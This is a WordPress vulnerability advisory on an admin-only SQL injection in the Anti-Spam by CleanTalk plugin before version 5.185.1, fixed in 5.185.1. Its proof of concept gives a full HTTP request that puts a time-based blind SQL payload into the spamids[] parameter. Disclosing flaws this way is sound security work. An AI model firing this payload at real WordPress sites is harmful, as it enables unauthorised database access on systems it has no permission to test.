WordPress Plugin Vulnerabilities
Anti-Spam by CleanTalk < 5.185.1 - Admin+ SQLi
Description
The plugin does not validate ids before using them in a SQL statement, which could lead to SQL injection exploitable by high privilege users such as admin
Proof of Concept
When deleting a scan logs (/edit-comments.php?page=ct_check_spam_logs), intercept the request and change the spamids[] parameter to 1%20AND%20(SELECT%209312%20FROM%20(SELECT(SLEEP(5)))hYkP) POST /wp-admin/edit-comments.php?page=ct_check_spam_logs HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 120 Origin: http://localhost Connection: close Cookie: [admin+] Upgrade-Insecure-Requests: 1 _wpnonce=dd06127571&action=delete&spamids%5B%5D=1%20AND%20(SELECT%209312%20FROM%20(SELECT(SLEEP(5)))hYkP)&action2=delete
Affects Plugins
Fixed in version 5.185.1
References
Classification
Miscellaneous
Original Researcher
Nguyen Duy Quoc Khanh
Submitter
Nguyen Duy Quoc Khanh
Submitter twitter
Verified
Yes
Timeline
Publicly Published
2022-10-03 (about 11 months ago)
Added
2022-10-03 (about 11 months ago)
Last Updated
2022-10-03 (about 11 months ago)